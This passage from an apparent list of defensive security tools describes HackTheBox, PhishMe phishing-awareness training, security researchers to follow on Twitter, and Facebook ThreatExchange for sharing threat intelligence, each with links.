https://www.hostingadvice.com/blog/learn-cybersecurity-with-tryhackme/* ### [๐Ÿ”™](#tool-list)[HackTheBox](https://www.hackthebox.com/) HackTheBox is a platform for practicing and improving your hacking skills. It consists of a set of challenges that simulate real-world scenarios and require you to use your knowledge of various hacking techniques to solve them. These challenges are designed to test your knowledge of topics such as network security, cryptography, web security, and more. HackTheBox is often used by security professionals as a way to practice and improve their skills, and it can also be a useful resource for security awareness training. By working through the challenges and learning how to solve them, individuals can gain a better understanding of how to identify and mitigate common security threats. Visit [https://app.hackthebox.com/login](https://app.hackthebox.com/login) and create an account. **Useful links:** [Blog - Introduction to Hack The Box](https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box) [Blog - Learn to Hack with Hack The Box: The Beginner's Bible](https://www.hackthebox.com/blog/learn-to-hack-beginners-bible) [Blog - Introduction to Starting Point](https://help.hackthebox.com/en/articles/6007919-introduction-to-starting-point) ![image](https://user-images.githubusercontent.com/100603074/210669087-d00d76d1-300f-48c9-8f7f-4b9b5157626e.png) *Image used from https://www.hackthebox.com/login* ### [๐Ÿ”™](#tool-list)[PhishMe](https://cofense.com/product-services/phishme/) PhishMe is a company that provides security awareness training to help organizations educate their employees about how to identify and prevent phishing attacks. PhishMe's training programs aim to teach employees how to recognize and report phishing attempts, as well as how to protect their personal and professional accounts from these types of attacks. The company's training programs can be customized to fit the needs of different organizations and can be delivered through a variety of mediums, including online courses, in-person training, and simulations. Request a demo from [here](https://go.cofense.com/live-demo/). **Useful links:** [Cofense Blog](https://cofense.com/blog/) [Cofense Knowledge Center](https://cofense.com/knowledge-center-hub/) ![image](https://user-images.githubusercontent.com/100603074/210669120-1b29007a-f7f6-40f6-922b-9b5b251f6447.png) *Image used from https://cofense.com/product-services/phishme/* Communication and Collaboration ==================== Tools for coordinating and communicating with team members during an incident, including chat, email, and project management software. ### [๐Ÿ”™](#tool-list)[Twitter](https://twitter.com/) Twitter is a great platform for sharing information about cyber security. It's a platform that is widely used by security professionals, researchers, and experts, giving you access to an endless amount of new information. Some great accounts to follow: - [@vxunderground](https://twitter.com/vxunderground) - [@Alh4zr3d](https://twitter.com/Alh4zr3d) - [@3xp0rtblog](https://twitter.com/3xp0rtblog) - [@C5pider](https://twitter.com/C5pider) - [@_JohnHammond](https://twitter.com/_JohnHammond) - [@mrd0x](https://twitter.com/mrd0x) - [@TheHackersNews](https://twitter.com/TheHackersNews) - [@pancak3lullz](https://twitter.com/pancak3lullz) - [@GossiTheDog](https://twitter.com/GossiTheDog) - [@briankrebs](https://twitter.com/briankrebs) - [@SwiftOnSecurity](https://twitter.com/SwiftOnSecurity) - [@schneierblog](https://twitter.com/schneierblog) - [@mikko](https://twitter.com/mikko) - [@campuscodi](https://twitter.com/campuscodi) ### [๐Ÿ”™](#tool-list)[Facebook TheatExchange](https://developers.facebook.com/docs/threat-exchange/getting-started) Facebook ThreatExchange is a platform for security professionals to share and analyze information about cyber threats. It was designed to help organizations better defend against threats by allowing them to share threat intelligence with each other in a private and secure way. It is intended to be used by "blue teams", who are responsible for the security of an organization and work to prevent, detect, and respond to cyber threats. **Usage:** To request access to ThreatExchange, you have to submit an application via [https://developers.facebook.com/products/threat-exchange/](https://developers.facebook.com/products/threat-exchange/). **Useful links:** [Welcome to ThreatExchange!](https://developers.facebook.com/docs/threat-exchange/getting-started) [ThreatExchange UI Overview](https://developers.facebook.com/docs/threat-exchange/ui) [ThreatExchange API Reference](https://developers.facebook.com/docs/threat-exchange/reference/apis) [GitHub - ThreatExchange](https://github.com/facebook/ThreatExchange/tree/main/python-threatexchange)